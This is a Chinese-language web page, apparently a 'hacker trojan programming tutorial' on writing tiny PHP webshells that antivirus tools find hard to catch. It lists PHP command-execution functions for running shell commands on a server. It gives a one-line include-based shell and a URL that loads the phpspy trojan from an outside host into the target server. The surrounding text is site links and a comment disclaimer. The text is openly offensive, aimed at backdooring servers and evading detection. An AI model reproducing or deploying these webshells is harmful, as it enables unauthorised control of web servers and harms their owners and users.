PHP语法的强大是ASP望尘莫及的,仅一个:就可以刺探整个服务器的配置。运行cmd,上传文件等,都是非常简便的,现在用的好的PHP木马,莫过于angel的phpspy了。昨天hak_ban问怎么给PHP木马加密,我还没想到,但是对于写一个微型PHP木马,我想还是很难被杀的。 这里简单探讨一下几个函数可以作为木马的使用: 1. 可以运行外部命令的几个函数:system,passthru,exec,shell_exec,popen。 例:只要将$cmd);?>等保存为cmd.php及可实现运行外部命令的功能。这几个函数可以说是最早的微行php木马了,所以一般虚拟主机的设置也会将这些函数屏蔽的。 2.还记得WDB论坛的style.php的漏洞吗?我们可以利用这个做个很难被杀的小木马。如下:
| <?php include($include);?> |
将其保存为1.php,我们就可以调用其他不支持php服务器里的.php木马(如phpspy.php)来达到我们的目的:http://6688.cc/1.php? Include=http://www.6688.cc/phpspy.php 这里http://www.6688.cc是不支持php的,否则将会在http://www.6688.cc这台服务器运行phpspy.php,而不是目标服务器。
| 【内容导航】 |
| 第1页:[黑客木马编程教程]微型PHP木马解析 | 第2页:[黑客木马编程教程]微型PHP木马解析 |
网络安全高级技巧 Linux后门技术与实践苹果MacBook也存在软肋 被黑客绕过防线间接入侵相关资讯 黑客 PHP木马
- 黑客透露他如何入侵Hacking Team的 (04月18日)
- 影响历史的四个黑客故事 (01月24日)
- 黑客利用 Wi-Fi 攻击你的七种方法 (12/28/2015 19:43:01)
| - 黑客控制 Dridex 服务器 用杀毒软 (02月07日)
- 黑客是如何入侵和控制物联网设备的 (12/31/2015 10:14:35)
- Ashley Madison黑客做种时留下了足 (08/24/2015 06:14:19)
|
本文评论 查看全部评论 (1)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
| |
易网时代-编程资源站